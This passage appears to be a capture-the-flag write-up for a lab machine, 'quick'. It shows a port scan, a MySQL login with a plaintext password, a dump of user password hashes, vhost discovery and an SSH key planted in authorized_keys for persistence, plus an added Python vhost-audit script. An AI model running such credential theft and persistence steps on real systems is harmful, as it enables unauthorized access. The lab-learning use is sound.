```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-06 15:01 CST
Nmap scan report for 10.10.10.186
Host is up (0.069s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 fb:b0:61:82:39:50:4b:21:a8:62:98:4c:9c:38:82:70 (RSA)
|   256 ee:bb:4b:72:63:17:10:ee:08:ff:e5:86:71:fe:8f:80 (ECDSA)
|_  256 80:a6:c2:73:41:f0:35:4e:5f:61:a7:6a:50:ea:b8:2e (ED25519)
9001/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Quick | Broadband Services
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.27 seconds
```
```
sam@quick:/var/www/html$ mysql -u db_adm -p
mysql -u db_adm -p
Enter password: db_p4ss

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 66
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| quick              |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql> use quick;
use quick;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------+
| Tables_in_quick |
+-----------------+
| jobs            |
| tickets         |
| users           |
+-----------------+
3 rows in set (0.00 sec)

mysql> select * from users;
select * from users;
+--------------+------------------+----------------------------------+
| name         | email            | password                         |
+--------------+------------------+----------------------------------+
| Elisa        | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d |
| Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 |
+--------------+------------------+----------------------------------+
2 rows in set (0.00 sec)
```
```
sam@quick:/var/www$ ls
ls
html  jobs  printer
sam@quick:/var/www$ cd printer
cd printer
sam@quick:/var/www/printer$ ls
ls
add_printer.php  db.php  favicon.ico  home.php  index.php  printers.php
css  escpos-php  fonts  images  job.php
sam@quick:/var/www/printer$
```
```
sam@quick:/var/www/printer$ cd /etc/apache2/sites-enabled
cd /etc/apache2/sites-enabled
sam@quick:/etc/apache2/sites-enabled$ ls
ls
000-default.conf
sam@quick:/etc/apache2/sites-enabled$ cat 000-default.conf
cat 000-default.conf
<VirtualHost *:80>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf
</VirtualHost>
<VirtualHost *:80>
        AssignUserId srvadm srvadm
        ServerName printerv2.quick.htb
        DocumentRoot /var/www/printer
</VirtualHost>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
```
This gives us the hostname printerv2.quick.htb, which should be served on port 80 on localhost.
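As an added example (not part of the original write-up), the Python below shows how an administrator could inventory the name-based virtual hosts in a file like the one above and see which account each one runs under. `SAMPLE_CONF` is a constructed copy of the directive lines shown above, `parse_vhosts` and `audit` are hypothetical helper names, and `AssignUserId` is assumed to be the mpm-itk directive that sets the user and group for a vhost's requests.

```python
import re

# Constructed sample: the directive lines of the 000-default.conf above, comments dropped.
SAMPLE_CONF = """\
<VirtualHost *:80>
    #ServerName www.example.com
</VirtualHost>
<VirtualHost *:80>
    AssignUserId srvadm srvadm
    ServerName printerv2.quick.htb
    DocumentRoot /var/www/printer
</VirtualHost>
"""
OPEN_RE = re.compile(r"<VirtualHost\s+([^>]+)>", re.I)

def parse_vhosts(conf_text):
    """Return one dict per <VirtualHost> block with the directives we audit."""
    vhosts, current = [], None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank line or commented-out directive
        opened = OPEN_RE.match(line)
        if opened:
            current = {"listen": opened.group(1).split(), "server_name": None,
                       "document_root": None, "run_as": None}
        elif line.lower().startswith("</virtualhost"):
            if current is not None:
                vhosts.append(current)
            current = None
        elif current is not None:
            key, *args = line.split()
            key = key.lower()
            if key == "servername" and args:
                current["server_name"] = args[0]
            elif key == "documentroot" and args:
                current["document_root"] = args[0].strip('"')
            elif key == "assignuserid" and len(args) >= 2:
                current["run_as"] = (args[0], args[1])  # assumed mpm-itk: user, group
    return vhosts

def audit(vhosts):
    """List vhosts whose requests run under a dedicated account (AssignUserId)."""
    return [f"{v['server_name'] or '(default)'} [{','.join(v['listen'])}] runs as "
            f"{v['run_as'][0]}:{v['run_as'][1]}, docroot {v['document_root']}"
            for v in vhosts if v["run_as"]]

if __name__ == "__main__":
    for finding in audit(parse_vhosts(SAMPLE_CONF)):
        print(finding)
```

A vhost listed by `audit` executes its web application with that account's privileges, so its document root and code deserve the same review as any other entry point to that user.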
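Port forwarding

We can forward the port out so that we can access it.

Adding a public key

First, we can add our own SSH public key, which makes the later steps easier: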
```
sam@quick:~$ mkdir .ssh
mkdir .ssh
sam@quick:~$ cd .ssh
cd .ssh
sam@quick:~/.ssh$ echo 'ssh-rsa xxxx' >> authorized_keys
sam@quick:~/.ssh$
```